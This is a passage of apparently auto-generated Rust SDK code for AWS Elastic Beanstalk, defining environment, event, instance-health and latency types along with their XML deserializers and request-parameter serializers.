Some(try!(VersionLabelDeserializer::deserialize("VersionLabel", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type EnvironmentDescriptionsList = Vec<EnvironmentDescription>; struct EnvironmentDescriptionsListDeserializer; impl EnvironmentDescriptionsListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EnvironmentDescriptionsList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(EnvironmentDescriptionDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } #[doc="<p>Result message containing a list of environment descriptions.</p>"] #[derive(Default,Debug,Clone)] pub struct EnvironmentDescriptionsMessage { #[doc="<p> Returns an <a>EnvironmentDescription</a> list. 
</p>"] pub environments: Option<EnvironmentDescriptionsList>, } struct EnvironmentDescriptionsMessageDeserializer; impl EnvironmentDescriptionsMessageDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EnvironmentDescriptionsMessage, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = EnvironmentDescriptionsMessage::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Environments" => { obj.environments = Some(try!(EnvironmentDescriptionsListDeserializer::deserialize("Environments", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type EnvironmentHealth = String; struct EnvironmentHealthDeserializer; impl EnvironmentHealthDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EnvironmentHealth, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type EnvironmentHealthAttribute = String; pub type EnvironmentHealthAttributes = Vec<EnvironmentHealthAttribute>; /// Serialize `EnvironmentHealthAttributes` contents to a `SignedRequest`. struct EnvironmentHealthAttributesSerializer; impl EnvironmentHealthAttributesSerializer { fn serialize(params: &mut Params, name: &str, obj: &EnvironmentHealthAttributes) { for (index, obj) in obj.iter().enumerate() { let key = format!("{}.member.{}", name, index+1); params.put(&key, &obj); } } } pub type EnvironmentHealthStatus = String; struct EnvironmentHealthStatusDeserializer; impl EnvironmentHealthStatusDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EnvironmentHealthStatus, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type EnvironmentId = String; struct EnvironmentIdDeserializer; impl EnvironmentIdDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EnvironmentId, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type EnvironmentIdList = Vec<EnvironmentId>; /// Serialize `EnvironmentIdList` contents to a `SignedRequest`. 
struct EnvironmentIdListSerializer; impl EnvironmentIdListSerializer { fn serialize(params: &mut Params, name: &str, obj: &EnvironmentIdList) { for (index, obj) in obj.iter().enumerate() { let key = format!("{}.member.{}", name, index+1); params.put(&key, &obj); } } } #[doc="<p>The information retrieved from the Amazon EC2 instances.</p>"] #[derive(Default,Debug,Clone)] pub struct EnvironmentInfoDescription { #[doc="<p>The Amazon EC2 Instance ID for this information.</p>"] pub ec_2_instance_id: Option<Ec2InstanceId>, #[doc="<p>The type of information retrieved.</p>"] pub info_type: Option<EnvironmentInfoType>, #[doc="<p>The retrieved information.</p>"] pub message: Option<Message>, #[doc="<p>The time stamp when this information was retrieved.</p>"] pub sample_timestamp: Option<SampleTimestamp>, } struct EnvironmentInfoDescriptionDeserializer; impl EnvironmentInfoDescriptionDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EnvironmentInfoDescription, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = EnvironmentInfoDescription::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Ec2InstanceId" => { obj.ec_2_instance_id = Some(try!(Ec2InstanceIdDeserializer::deserialize("Ec2InstanceId", stack))); } "InfoType" => { obj.info_type = Some(try!(EnvironmentInfoTypeDeserializer::deserialize("InfoType", stack))); } "Message" => { obj.message = Some(try!(MessageDeserializer::deserialize("Message", stack))); } "SampleTimestamp" => { obj.sample_timestamp = Some(try!(SampleTimestampDeserializer::deserialize("SampleTimestamp", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type EnvironmentInfoDescriptionList = Vec<EnvironmentInfoDescription>; struct EnvironmentInfoDescriptionListDeserializer; impl EnvironmentInfoDescriptionListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EnvironmentInfoDescriptionList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(EnvironmentInfoDescriptionDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } pub type EnvironmentInfoType = String; struct EnvironmentInfoTypeDeserializer; impl EnvironmentInfoTypeDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EnvironmentInfoType, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>A link to another environment, defined in the environment's manifest. 
Links provide connection information in system properties that can be used to connect to another environment in the same group. See <a href=\"http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/environment-cfg-manifest.html\">Environment Manifest (env.yaml)</a> for details.</p>"] #[derive(Default,Debug,Clone)] pub struct EnvironmentLink { #[doc="<p>The name of the linked environment (the dependency).</p>"] pub environment_name: Option<String>, #[doc="<p>The name of the link.</p>"] pub link_name: Option<String>, } struct EnvironmentLinkDeserializer; impl EnvironmentLinkDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EnvironmentLink, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = EnvironmentLink::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "EnvironmentName" => { obj.environment_name = Some(try!(StringDeserializer::deserialize("EnvironmentName", stack))); } "LinkName" => { obj.link_name = Some(try!(StringDeserializer::deserialize("LinkName", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type EnvironmentLinks = Vec<EnvironmentLink>; struct EnvironmentLinksDeserializer; impl EnvironmentLinksDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EnvironmentLinks, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(EnvironmentLinkDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } pub type EnvironmentName = String; struct EnvironmentNameDeserializer; impl EnvironmentNameDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EnvironmentName, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type EnvironmentNamesList = Vec<EnvironmentName>; /// Serialize `EnvironmentNamesList` contents to a `SignedRequest`. struct EnvironmentNamesListSerializer; impl EnvironmentNamesListSerializer { fn serialize(params: &mut Params, name: &str, obj: &EnvironmentNamesList) { for (index, obj) in obj.iter().enumerate() { let key = format!("{}.member.{}", name, index+1); params.put(&key, &obj); } } } #[doc="<p>Describes the AWS resources in use by this environment. This data is live.</p>"] #[derive(Default,Debug,Clone)] pub struct EnvironmentResourceDescription { #[doc="<p> The <code>AutoScalingGroups</code> used by this environment. 
</p>"] pub auto_scaling_groups: Option<AutoScalingGroupList>, #[doc="<p>The name of the environment.</p>"] pub environment_name: Option<EnvironmentName>, #[doc="<p>The Amazon EC2 instances used by this environment.</p>"] pub instances: Option<InstanceList>, #[doc="<p>The Auto Scaling launch configurations in use by this environment.</p>"] pub launch_configurations: Option<LaunchConfigurationList>, #[doc="<p>The LoadBalancers in use by this environment.</p>"] pub load_balancers: Option<LoadBalancerList>, #[doc="<p>The queues used by this environment.</p>"] pub queues: Option<QueueList>, #[doc="<p>The <code>AutoScaling</code> triggers in use by this environment. </p>"] pub triggers: Option<TriggerList>, } struct EnvironmentResourceDescriptionDeserializer; impl EnvironmentResourceDescriptionDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EnvironmentResourceDescription, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = EnvironmentResourceDescription::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "AutoScalingGroups" => { obj.auto_scaling_groups = Some(try!(AutoScalingGroupListDeserializer::deserialize("AutoScalingGroups", stack))); } "EnvironmentName" => { obj.environment_name = Some(try!(EnvironmentNameDeserializer::deserialize("EnvironmentName", stack))); } "Instances" => { obj.instances = Some(try!(InstanceListDeserializer::deserialize("Instances", stack))); } "LaunchConfigurations" => { obj.launch_configurations = Some(try!(LaunchConfigurationListDeserializer::deserialize("LaunchConfigurations", stack))); } "LoadBalancers" => { obj.load_balancers = Some(try!(LoadBalancerListDeserializer::deserialize("LoadBalancers", stack))); } "Queues" => { obj.queues = Some(try!(QueueListDeserializer::deserialize("Queues", stack))); } "Triggers" => { obj.triggers = Some(try!(TriggerListDeserializer::deserialize("Triggers", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Result message containing a list of environment resource descriptions.</p>"] #[derive(Default,Debug,Clone)] pub struct EnvironmentResourceDescriptionsMessage { #[doc="<p> A list of <a>EnvironmentResourceDescription</a>. </p>"] pub environment_resources: Option<EnvironmentResourceDescription>, } struct EnvironmentResourceDescriptionsMessageDeserializer; impl EnvironmentResourceDescriptionsMessageDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EnvironmentResourceDescriptionsMessage, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = EnvironmentResourceDescriptionsMessage::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] 
{ "EnvironmentResources" => { obj.environment_resources = Some(try!(EnvironmentResourceDescriptionDeserializer::deserialize("EnvironmentResources", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Describes the AWS resources in use by this environment. This data is not live data.</p>"] #[derive(Default,Debug,Clone)] pub struct EnvironmentResourcesDescription { #[doc="<p>Describes the LoadBalancer.</p>"] pub load_balancer: Option<LoadBalancerDescription>, } struct EnvironmentResourcesDescriptionDeserializer; impl EnvironmentResourcesDescriptionDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EnvironmentResourcesDescription, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = EnvironmentResourcesDescription::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "LoadBalancer" => { obj.load_balancer = Some(try!(LoadBalancerDescriptionDeserializer::deserialize("LoadBalancer", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type EnvironmentStatus = String; struct EnvironmentStatusDeserializer; impl EnvironmentStatusDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EnvironmentStatus, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Describes the properties of an environment tier</p>"] #[derive(Default,Debug,Clone)] pub struct EnvironmentTier { #[doc="<p>The name of this environment tier.</p>"] pub name: Option<String>, #[doc="<p>The type of this environment tier.</p>"] pub type_: Option<String>, #[doc="<p>The version of this environment tier.</p>"] pub version: Option<String>, } struct EnvironmentTierDeserializer; impl EnvironmentTierDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EnvironmentTier, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = EnvironmentTier::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Name" => { obj.name = Some(try!(StringDeserializer::deserialize("Name", stack))); } "Type" => { obj.type_ = Some(try!(StringDeserializer::deserialize("Type", stack))); } "Version" => { obj.version = Some(try!(StringDeserializer::deserialize("Version", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } /// Serialize `EnvironmentTier` contents to a `SignedRequest`. 
struct EnvironmentTierSerializer; impl EnvironmentTierSerializer { fn serialize(params: &mut Params, name: &str, obj: &EnvironmentTier) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.name { params.put(&format!("{}{}", prefix, "Name"), &field_value); } if let Some(ref field_value) = obj.type_ { params.put(&format!("{}{}", prefix, "Type"), &field_value); } if let Some(ref field_value) = obj.version { params.put(&format!("{}{}", prefix, "Version"), &field_value); } } } pub type EventDate = String; struct EventDateDeserializer; impl EventDateDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EventDate, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Describes an event.</p>"] #[derive(Default,Debug,Clone)] pub struct EventDescription { #[doc="<p>The application associated with the event.</p>"] pub application_name: Option<ApplicationName>, #[doc="<p>The name of the environment associated with this event.</p>"] pub environment_name: Option<EnvironmentName>, #[doc="<p>The date when the event occurred.</p>"] pub event_date: Option<EventDate>, #[doc="<p>The event message.</p>"] pub message: Option<EventMessage>, #[doc="<p>The web service request ID for the activity of this event.</p>"] pub request_id: Option<RequestId>, #[doc="<p>The severity level of this event.</p>"] pub severity: Option<EventSeverity>, #[doc="<p>The name of the configuration associated with this event.</p>"] pub template_name: Option<ConfigurationTemplateName>, #[doc="<p>The release label for the application version associated with this event.</p>"] pub version_label: Option<VersionLabel>, } struct EventDescriptionDeserializer; impl EventDescriptionDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EventDescription, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = EventDescription::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] 
{ "ApplicationName" => { obj.application_name = Some(try!(ApplicationNameDeserializer::deserialize("ApplicationName", stack))); } "EnvironmentName" => { obj.environment_name = Some(try!(EnvironmentNameDeserializer::deserialize("EnvironmentName", stack))); } "EventDate" => { obj.event_date = Some(try!(EventDateDeserializer::deserialize("EventDate", stack))); } "Message" => { obj.message = Some(try!(EventMessageDeserializer::deserialize("Message", stack))); } "RequestId" => { obj.request_id = Some(try!(RequestIdDeserializer::deserialize("RequestId", stack))); } "Severity" => { obj.severity = Some(try!(EventSeverityDeserializer::deserialize("Severity", stack))); } "TemplateName" => { obj.template_name = Some(try!(ConfigurationTemplateNameDeserializer::deserialize("TemplateName", stack))); } "VersionLabel" => { obj.version_label = Some(try!(VersionLabelDeserializer::deserialize("VersionLabel", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type EventDescriptionList = Vec<EventDescription>; struct EventDescriptionListDeserializer;<|fim▁hole|> impl EventDescriptionListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EventDescriptionList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(EventDescriptionDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } #[doc="<p>Result message wrapping a list of event descriptions.</p>"] #[derive(Default,Debug,Clone)] pub struct EventDescriptionsMessage { #[doc="<p> A list of <a>EventDescription</a>. </p>"] pub events: Option<EventDescriptionList>, #[doc="<p> If returned, this indicates that there are more results to obtain. Use this token in the next <a>DescribeEvents</a> call to get the next batch of events. </p>"] pub next_token: Option<Token>, } struct EventDescriptionsMessageDeserializer; impl EventDescriptionsMessageDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EventDescriptionsMessage, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = EventDescriptionsMessage::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] 
{ "Events" => { obj.events = Some(try!(EventDescriptionListDeserializer::deserialize("Events", stack))); } "NextToken" => { obj.next_token = Some(try!(TokenDeserializer::deserialize("NextToken", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type EventMessage = String; struct EventMessageDeserializer; impl EventMessageDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EventMessage, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type EventSeverity = String; struct EventSeverityDeserializer; impl EventSeverityDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<EventSeverity, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type ExceptionMessage = String; pub type FailureType = String; struct FailureTypeDeserializer; impl FailureTypeDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<FailureType, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type FileTypeExtension = String; struct FileTypeExtensionDeserializer; impl FileTypeExtensionDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<FileTypeExtension, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type ForceTerminate = bool; pub type GroupName = String; pub type IncludeDeleted = bool; pub type IncludeDeletedBackTo = String; #[doc="<p>The description of an Amazon EC2 instance.</p>"] #[derive(Default,Debug,Clone)] pub struct Instance { #[doc="<p>The ID of the Amazon EC2 instance.</p>"] pub id: Option<ResourceId>, } struct InstanceDeserializer; impl InstanceDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<Instance, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = Instance::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Id" => { obj.id = Some(try!(ResourceIdDeserializer::deserialize("Id", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type InstanceHealthList = Vec<SingleInstanceHealth>; struct InstanceHealthListDeserializer; impl InstanceHealthListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<InstanceHealthList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. 
})) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(SingleInstanceHealthDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } #[doc="<p>Represents summary information about the health of an instance. For more information, see <a href=\"http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/health-enhanced-status.html\">Health Colors and Statuses</a>.</p>"] #[derive(Default,Debug,Clone)] pub struct InstanceHealthSummary { #[doc="<p> <b>Red.</b> The health agent is reporting a high number of request failures or other issues for an instance or environment.</p>"] pub degraded: Option<NullableInteger>, #[doc="<p> <b>Green.</b> An operation is in progress on an instance.</p>"] pub info: Option<NullableInteger>, #[doc="<p> <b>Grey.</b> AWS Elastic Beanstalk and the health agent are reporting no data on an instance.</p>"] pub no_data: Option<NullableInteger>, #[doc="<p> <b>Green.</b> An instance is passing health checks and the health agent is not reporting any problems.</p>"] pub ok: Option<NullableInteger>, #[doc="<p> <b>Grey.</b> An operation is in progress on an instance within the command timeout.</p>"] pub pending: Option<NullableInteger>, #[doc="<p> <b>Red.</b> The health agent is reporting a very high number of request failures or other issues for an instance or environment.</p>"] pub severe: Option<NullableInteger>, #[doc="<p> <b>Grey.</b> AWS Elastic Beanstalk and the health agent are reporting an insufficient amount of data on an instance.</p>"] pub unknown: Option<NullableInteger>, #[doc="<p> <b>Yellow.</b> The health agent is reporting a moderate number of request failures or other issues for an instance or environment.</p>"] pub warning: Option<NullableInteger>, } struct InstanceHealthSummaryDeserializer; impl InstanceHealthSummaryDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<InstanceHealthSummary, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = InstanceHealthSummary::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] 
{ "Degraded" => { obj.degraded = Some(try!(NullableIntegerDeserializer::deserialize("Degraded", stack))); } "Info" => { obj.info = Some(try!(NullableIntegerDeserializer::deserialize("Info", stack))); } "NoData" => { obj.no_data = Some(try!(NullableIntegerDeserializer::deserialize("NoData", stack))); } "Ok" => { obj.ok = Some(try!(NullableIntegerDeserializer::deserialize("Ok", stack))); } "Pending" => { obj.pending = Some(try!(NullableIntegerDeserializer::deserialize("Pending", stack))); } "Severe" => { obj.severe = Some(try!(NullableIntegerDeserializer::deserialize("Severe", stack))); } "Unknown" => { obj.unknown = Some(try!(NullableIntegerDeserializer::deserialize("Unknown", stack))); } "Warning" => { obj.warning = Some(try!(NullableIntegerDeserializer::deserialize("Warning", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type InstanceId = String; struct InstanceIdDeserializer; impl InstanceIdDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<InstanceId, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type InstanceList = Vec<Instance>; struct InstanceListDeserializer; impl InstanceListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<InstanceList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(InstanceDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } pub type InstancesHealthAttribute = String; pub type InstancesHealthAttributes = Vec<InstancesHealthAttribute>; /// Serialize `InstancesHealthAttributes` contents to a `SignedRequest`. 
struct InstancesHealthAttributesSerializer; impl InstancesHealthAttributesSerializer { fn serialize(params: &mut Params, name: &str, obj: &InstancesHealthAttributes) { for (index, obj) in obj.iter().enumerate() { let key = format!("{}.member.{}", name, index+1); params.put(&key, &obj); } } } pub type Integer = i64; struct IntegerDeserializer; impl IntegerDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<Integer, XmlParseError> { try!(start_element(tag_name, stack)); let obj = i64::from_str(try!(characters(stack)).as_ref()).unwrap(); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Represents the average latency for the slowest X percent of requests over the last 10 seconds.</p>"] #[derive(Default,Debug,Clone)] pub struct Latency { #[doc="<p>The average latency for the slowest 90 percent of requests over the last 10 seconds.</p>"] pub p10: Option<NullableDouble>, #[doc="<p>The average latency for the slowest 50 percent of requests over the last 10 seconds.</p>"] pub p50: Option<NullableDouble>, #[doc="<p>The average latency for the slowest 25 percent of requests over the last 10 seconds.</p>"] pub p75: Option<NullableDouble>, #[doc="<p>The average latency for the slowest 15 percent of requests over the last 10 